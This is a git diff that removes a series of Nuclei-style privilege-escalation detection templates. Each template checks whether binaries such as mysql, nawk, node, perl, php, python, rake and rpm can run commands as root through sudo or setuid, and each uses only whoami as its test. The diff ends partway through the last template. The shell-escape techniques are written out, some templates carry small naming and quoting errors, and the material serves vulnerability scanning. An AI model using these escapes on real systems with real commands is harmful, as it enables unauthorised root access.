# digest: 490a0046304402200f2fc2cb7ee4195d6ba84734e5816cd6344c1027d789617f593fd573a882798d0220456bbb1bff1ee4887264d39670a7bafd2d3e6e5714ac616b65454e26490b1c50:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-multitime
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Multitime - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
multitime is a command-line utility that allows for the timing and execution of commands multiple times. It is often used for benchmarking and performance testing of commands and scripts, providing a convenient way to measure the execution time of a given task.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/multitime/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,multitime,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
multitime whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo multitime whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100d690fd1752fe80fe6c5d74dd217f1faa159c22b9a1139640caef077da0ca162802201b52fef3e20b018125ed2898a41ee118a709b666e1be56843798f64ad03c4d01:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-mysql
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: MySQL - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
MySQL is an open-source relational database management system (RDBMS) that uses structured query language (SQL) for managing and manipulating data. It is widely used for web applications and is known for its reliability, ease of use, and performance. MySQL is a popular choice for database-driven applications and is supported on various platforms.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/mysql/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,mysql,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
mysql -e '\! whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo mysql -e '\! whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100ab3c58233daf1cde6a71b666f1ad59b29abb8f36ac9d2caf325d3ef30dbb7d63022100ee4ec42f3059b0d1e07f5e7b6132d20f247b66f95e28d4cf74587040d390df0b:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-nawk
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: nawk - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
nawk is an implementation of the AWK programming language. It is a text-processing language that is commonly used for pattern scanning and processing of text files. nawk provides powerful features for data extraction, reporting, and manipulation, making it a valuable tool for text processing tasks in shell scripts and command-line environments.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/nawk/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,nawk,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
nawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo nawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100c455bfbade2717cae09e5e1ad5d3f3f32f100dabe62e9ed83960ea513ec0c9190220455786daaf6e8b9213b6921268602b555e67d35000aa1bd4bca08006d233f58e:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-nice
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Nice - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
In Unix-like operating systems, the nice command is used to execute a program with a modified scheduling priority. It allows users to start a process with a specified priority level, which can influence the allocation of CPU resources. This can be useful for managing system resources and controlling the impact of a process on system performance.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/nice/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,nice,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
nice whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo nice whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502206658814909d649229bdbe08eca7e6695d1fb07bf9cc2b42e87052ada4c56e87b02210098cecf5578ad70645f6f11e5cabe566e9d602b2f528f764bab48200bd9fc32af:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-node
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Node - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Node.js is a popular open-source, cross-platform JavaScript runtime environment that executes JavaScript code outside of a web browser. It is commonly used for building scalable network applications and is known for its event-driven, non-blocking I/O model. Node.js is widely used for server-side scripting and has a large ecosystem of libraries and frameworks.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/node/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,node,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
node -e 'process.setuid(0); require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100dcb589afe5b82d4c95a8a103942bdfa4ffdeca24be83816bda1013e2efdb0648022067f67aba51dd433b67493daa6970d379d08bf8c91351375fac26c6c2a54f0999:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-nsenter
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Nsenter - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
nsenter is a command-line utility in Linux that allows a user to enter into an existing namespace. It is commonly used for troubleshooting and managing namespaces in containerized environments. By using nsenter, users can enter into a specific namespace and execute commands within that namespace, which can be helpful for various system administration tasks.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/nsenter/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,nsenter,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
nsenter whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo nsenter whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100bcc2702e046210af31cecc2bc6d6f6f17d55deba9283429ecbaa37b2da7ad3d6022076555f0b6ddfef5630de6165278458fec5a6dfd9dbe33a25ccac7d35827df83f:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-perl
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Perl - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Perl is a high-level, general-purpose programming language known for its powerful text processing capabilities. It is often used for system administration, web development, and network programming. Perl's syntax and features make it well-suited for tasks such as parsing and manipulating text, making it a popular choice for various scripting and automation tasks.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/perl/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,perl,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
perl -e 'exec "whoami";'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo perl -e 'exec "whoami";'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402200a093cb0aa2ec75dfb33f02dc087b501b5f6187d60468a6c67db3cddffc095d30220078ba7495f4c1a33103ce617214ba05d89845fd6941672e576ab45a8a1cb89d8:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-pexec
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: pexec - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
The term "pexec" typically refers to the "privileged execution" of a command or program.
|
|
||||||
reference: |
|
|
||||||
https://gtfobins.github.io/gtfobins/pexec/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,pexec,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
pexec whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo pexec whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100c000c6aff21897526283edb9a61a091f4bf4f35f40ba88d17a5be43abca4078802200947b42987bab5740cbae7af869fa6f069e877273bd74f31eb6fc52700de08c0:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-php
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: PHP - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
PHP is a popular server-side scripting language that is widely used for web development. It is known for its ease of use, flexibility, and broad support for web frameworks and content management systems. PHP is commonly used to create dynamic web pages, process form data, manage sessions, and interact with databases.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/php/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,php,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
php -r 'system("whoami");'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo php -r 'system("whoami");'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
php -r "posix_setuid(0); system("whoami");"
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100a2811ec94d726526a0710b6e046ee5f70bc02c6157d3f5e8d01149b0355c021d022100c4be4f37e14acf2f6798474a6e96d2d4c9179e1bf72dddeb6def304c006d2839:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-posh
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: posh - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
"posh" typically refers to the "Policy-compliant Ordinary SHell," which is a restricted shell designed to provide a limited set of commands and features for users with restricted access. It is often used in environments where users require limited functionality and access to system resources.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/posh/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,posh,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
posh -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo posh -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402202ccc69f1fcf287f4fec214024209ac72716454f2cf716fdc0793cbca8c0d3929022078a753c35cd96d3bec81ce9d3701450bb0d3e91edc06bbb531b961e240965014:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,55 +0,0 @@
|
||||||
id: privesc-python
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: PHP - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Python is a high-level, general-purpose programming language known for its readability and simplicity. It is widely used for web development, scientific computing, artificial intelligence, and system automation. Python's versatility, extensive standard library, and large community make it a popular choice for a wide range of applications.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/python/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,php,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
python -c 'import os; os.system("whoami")'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo python -c 'import os; os.system("whoami")'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
python -c 'import os; os.setuid(0); os.system("whoami")'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
- 'contains(code_4_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100dd52f3cccbdc07d60cadac29decf11d1227996a161f41918275422c8076e5398022100bb97bda70a37f3f30a579fa0cc157826af2f11edd9bd7aab0da65e3dabfbba6c:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rake
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Rake - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Rake is a build automation tool written in Ruby. It is similar to Make, Ant, or MSBuild, but uses a Ruby syntax. Rake is often used for automating tasks in software development, such as building, testing, and deploying applications.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rake/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rake,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rake -p '`whoami 1>&0`'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rake -p '`whoami 1>&0`'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402200749958e9afd9829c1f67a0ccc3dc94d28bc49715a8335644e76b91eab470a0f02205f3c3d21b41c81dd7e52a8716b05f8e688af8afd0b203aff9e0d89850fe800e8:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rc
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: RC - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
the rc command is a shell command interpreter that is used to execute commands and scripts. It is commonly used for scripting and automation tasks, and it provides a set of built-in commands and features for interacting with the system.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rc/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rc,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rc -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rc -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100ddc05de2641a181def4a9885d521a3060f68cbffdd0bac50e77315bd7e454bdd022025d8281ce109511fd7daa67dc3d51337c4dc4086cf0e084656e9143fb87170e0:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rlwrap
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: rlwrap - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
rlwrap is a utility that provides readline functionality to commands that lack it, allowing for command-line editing and history capabilities. It is commonly used to enhance the user experience when working with command-line tools that do not have built-in readline support.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rlwrap/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rlwrap,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rlwrap whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rlwrap whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502200ca88583b60e012b980e0043f04126ac3b05a5583b20efda37538715a768ecb7022100f29a6760712b6791f1bb45ce5e7d6b1b5fc92f267e3ffc99497fb0eaa7dca258:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rpm
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: rpm - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
rpm stands for "Red Hat Package Manager." It is a command-line package management utility used in Red Hat-based Linux distributions to install, update, and manage software packages. rpm is also used to query package information, verify package integrity, and perform various administrative tasks related to software packages.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rpm/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rpm,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rpm --pipe 'whoami 0<&1'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rpm --pipe 'whoami 0<&1'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a004730450220528464c28b189da3511e6757b61dcb7f6fba8a90515f2b337edcdb7aee9f5d7d022100b4c40f9809265bb79ffc65b504aa4074521a1b1e5a50f3d7a1dd91530b8dfed7:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rpmdb
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: rpmdb - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
The rpmdb is the database used by the RPM Package Manager to store metadata about installed packages on a Linux system. It is used to track information about installed packages, including their files, dependencies, and other attributes. The rpmdb is a critical component of package management on RPM-based Linux distributions.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/rpmdb/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,rpmdb,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
rpmdb --eval '%(whoami 1>&2)'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo rpmdb --eval '%(whoami 1>&2)'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402205c6ed2d663dbda0003dc3b0315103fb62ce649fc9771b88d15e9003c0093f6c402207181b174440db32afaaecb0c106c6ecafcb7605d20272b86c7055b7c96988b08:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-rpmverify
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: rpmverify - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
